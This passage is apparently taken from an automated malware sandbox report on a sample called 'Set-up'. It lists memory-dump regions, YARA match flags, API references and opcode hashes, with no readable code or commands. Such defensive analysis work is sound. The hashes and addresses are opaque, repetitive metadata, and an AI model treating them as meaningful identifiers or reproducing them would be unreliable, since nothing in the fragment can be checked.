                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 2f0dcc35e2f7af509bf11e83d27bbc485d53abde26f575190c1a773d22898da0
                                                                                                                                                  • Instruction ID: 1fdd2a717cb97ed4e187c9706971acddc455a74bc21997de0517e87a278fc5f2
                                                                                                                                                  • Opcode Fuzzy Hash: 2f0dcc35e2f7af509bf11e83d27bbc485d53abde26f575190c1a773d22898da0
                                                                                                                                                  • Instruction Fuzzy Hash: DBA002B89512418F9702DF62AC095487AE0F69B70BB5141B7B94991268EF780251EE1F
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0046E241
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 40c49887127a3170df94af6f083223f703dfe708a5dc88237e3cb57f6cfeb3c8
                                                                                                                                                  • Instruction ID: 4f22265d44ea2fe2232677059ffa59fa0b1127c3bf87c851de1c3118201eb1f3
                                                                                                                                                  • Opcode Fuzzy Hash: 40c49887127a3170df94af6f083223f703dfe708a5dc88237e3cb57f6cfeb3c8
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: da8c9f6550ffaa1b5821f55ca399044c447c6e887107e5af81a0e7150c46538d
                                                                                                                                                  • Instruction ID: 32fb2b876d0f16adfa80fa3fa60db48abd3c8bb15ca909c7764a0b51b0e26360
                                                                                                                                                  • Opcode Fuzzy Hash: da8c9f6550ffaa1b5821f55ca399044c447c6e887107e5af81a0e7150c46538d
                                                                                                                                                  • Instruction Fuzzy Hash: BD7169756083918BE319DF79847037BBBD29F9B304F18886DE4C69B381CA35CD058B56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: 99bd048e5fea5e232f081df83c3fe2e60159e57633064fbef8c65493b66a16b2
                                                                                                                                                  • Instruction ID: a2a2bd6a448ab0a4d919745fff05c2c4a5695b6029a3f20b5627d96020f1d664
                                                                                                                                                  • Opcode Fuzzy Hash: 99bd048e5fea5e232f081df83c3fe2e60159e57633064fbef8c65493b66a16b2
                                                                                                                                                  • Instruction Fuzzy Hash: A27168756083918BE318DF7984703BBBBD29F9B304F1888ADE4C69B381CA75CD058B56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: _
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7117030824d6eef071f92dd2fa6c57ff35cbd9bba8807f2e9288d75236661c67
                                                                                                                                                  • Instruction ID: 59198f4574b774fe34b8345fb3ce4e354cc64c126854f95980a94909f4f2f00b
                                                                                                                                                  • Opcode Fuzzy Hash: 7117030824d6eef071f92dd2fa6c57ff35cbd9bba8807f2e9288d75236661c67
                                                                                                                                                  • Instruction Fuzzy Hash: D052F7709087858FEB31EB24C4843E7BBE2EF55310F944A2EC5E647782DB79A885C752
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9c9625ab40efff8d822f887c8ac9d2bb95c7f5b122ab358039b62d64d5c56f2e
                                                                                                                                                  • Instruction ID: a0729989e9647720d11ce7f72f0daf50516cd73c937420acea623221b2684c41
                                                                                                                                                  • Opcode Fuzzy Hash: 9c9625ab40efff8d822f887c8ac9d2bb95c7f5b122ab358039b62d64d5c56f2e
                                                                                                                                                  • Instruction Fuzzy Hash: 266280F4611B409FD3A5CF2DC851B93BBE8EB0A710F01496EA5AEC7351D77469008FAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 95788fa378616162f094cb3dd953eea7709f3b6192a3f0f10503893f277c360c
                                                                                                                                                  • Instruction ID: 2fa409f907855fa7f1d15c650687eed1ec2e8ae58a361655165c2c8f9d99ba99
                                                                                                                                                  • Opcode Fuzzy Hash: 95788fa378616162f094cb3dd953eea7709f3b6192a3f0f10503893f277c360c
                                                                                                                                                  • Instruction Fuzzy Hash: 8D527DB0609B809FD329CF3CC845797BFEAAB9A314F144A5DE0EE87391C77564018B66
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
                                                                                                                                                  • Instruction ID: f8d89a40aec97cee048de923cf26746bc25baa273cab201799d5a2a177ab9f3b
                                                                                                                                                  • Opcode Fuzzy Hash: 32689895d184e7f7d0c8efe2be480a3565db7d92c53ad8a2ab611800512ab1f1
                                                                                                                                                  • Instruction Fuzzy Hash: 40425A72A087058FC718CF1AC48055AF7E2BFCC314F5A896EE89997351DB74E90ACB85
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1a7c39541ab6fc715c209d7e15cee471a3d96b43221501b4c5106a65fdbc7202
                                                                                                                                                  • Instruction ID: 7bb7c402ad97b8785e3e4d3b50e9fdb8eb3aac32e115ca8ec8b4140725abe827
                                                                                                                                                  • Opcode Fuzzy Hash: 1a7c39541ab6fc715c209d7e15cee471a3d96b43221501b4c5106a65fdbc7202
                                                                                                                                                  • Instruction Fuzzy Hash: 5422C232A087118BC734EF18D8846BBB3E2BFC4315F298A2DD9C697385D734A915CB56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d6afb882f270b3ca97b0d0ccfd863417d2646019f53889ca98050a312a4bf4ad
                                                                                                                                                  • Instruction ID: 7c1315152c3f5603f2fa44bcb47dfc772258636275faa2953d25e26a79be3439
                                                                                                                                                  • Opcode Fuzzy Hash: d6afb882f270b3ca97b0d0ccfd863417d2646019f53889ca98050a312a4bf4ad
                                                                                                                                                  • Instruction Fuzzy Hash: 90320270915F208FC368EF29C59056ABBF2BB45710BA44A2ED69787F90D736F885CB10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 17ffa470ae9efb0b85f997ee007593dd43fa4b4063593d73e58f188b725abe9e
                                                                                                                                                  • Instruction ID: 7a3a113fac760d0db455934929c0f2a2eee8e719598ad99478277b67b1d6b07c
                                                                                                                                                  • Opcode Fuzzy Hash: 17ffa470ae9efb0b85f997ee007593dd43fa4b4063593d73e58f188b725abe9e
                                                                                                                                                  • Instruction Fuzzy Hash: AC22C7317046458FC728CF29C5907AE77E2AFD9305F14462EE89AC7392D738E949CB89
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4cb9bce038c970dce907c761a1d9adec61157701bce0cdc1a79d0bb5998baf7c
                                                                                                                                                  • Instruction ID: 8e122a9e3be15e9251e441aef3cdb2e4453e21d2d6968193d38695ec75f0f52c
                                                                                                                                                  • Opcode Fuzzy Hash: 4cb9bce038c970dce907c761a1d9adec61157701bce0cdc1a79d0bb5998baf7c
                                                                                                                                                  • Instruction Fuzzy Hash: EA32B0756142898FCB36CF29CD516DE33A9FFA8318F10452AED498B344EF34AA45CB46
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bef30643de3fd98304cd36f68297b5199011961b57be55f1ee2f8668a151e60a
                                                                                                                                                  • Instruction ID: 4ccf98c0a2bc364bf37854fa1a7d3da9565089970da9dc95ccc7119055af3843
                                                                                                                                                  • Opcode Fuzzy Hash: bef30643de3fd98304cd36f68297b5199011961b57be55f1ee2f8668a151e60a
                                                                                                                                                  • Instruction Fuzzy Hash: 63F1E4B59007008FDB24CF29C9926A3BFF2FF56310B18865DD8C68BB55D734A41ADBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0feeee600e9a4edcfdc768cb2544d8c54ed1125f089782154d786a6445aeae60
                                                                                                                                                  • Instruction ID: b942713bfbd22b10302f2cf37a729d24907ff2bf92ece13d433cd4ef0d1728b2
                                                                                                                                                  • Opcode Fuzzy Hash: 0feeee600e9a4edcfdc768cb2544d8c54ed1125f089782154d786a6445aeae60
                                                                                                                                                  • Instruction Fuzzy Hash: 5032C2716082458FCB19CF18D4906AEB7E2FFD8308F188A2DE98687354E739E955CF42
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                                                                                  • Instruction ID: a4930de77adf6fcac4470f57cd0813e1c4017bc96e976d71beac56f49e18b6e3
                                                                                                                                                  • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                                                                                  • Instruction Fuzzy Hash: E3021772A042118BD71CCE19C58027DBBE2FBC5346F150A3FEC9697786D6389A4CCB99
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2a8a6d8949da7d3be06dbde538811fef6e79390a09c169898c156bcf58bf8b8b
                                                                                                                                                  • Instruction ID: d5c7bcf13016906bc4ff0585fbdef277bcef1e4551d13857c2fcbe39578fdeb6
                                                                                                                                                  • Opcode Fuzzy Hash: 2a8a6d8949da7d3be06dbde538811fef6e79390a09c169898c156bcf58bf8b8b
                                                                                                                                                  • Instruction Fuzzy Hash: 87125930608781CFD720DF25C494BAFBBE1AFD5304F14891EE89987392DA799849CB67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: facc3e7effd260b94c714cd82ef37065a504a632db77055e797ec30251465d71
                                                                                                                                                  • Instruction ID: 3858a6ff518aa6eb16a9175b9143439e7f9196016a1064f84f0ac9ab79c6384c
                                                                                                                                                  • Opcode Fuzzy Hash: facc3e7effd260b94c714cd82ef37065a504a632db77055e797ec30251465d71
                                                                                                                                                  • Instruction Fuzzy Hash: F8C17BB16483109BD724DFA888816EFB793EBC6324F28853CE59593391D772EC85C786
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e36dbe571fdccfe0d9aac939521a25e97b3c247727a75660dc4e7d5ead9e41c5
                                                                                                                                                  • Instruction ID: f7b297e88a1de2bc42e96e3c6c3bfffdaaf08bd4d12e7d72834be00b0e23768c
                                                                                                                                                  • Opcode Fuzzy Hash: e36dbe571fdccfe0d9aac939521a25e97b3c247727a75660dc4e7d5ead9e41c5
                                                                                                                                                  • Instruction Fuzzy Hash: 4A02F271704B028BD718CF28C590666FBE1BF99314F18462ED89A87741D738F866CBDA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
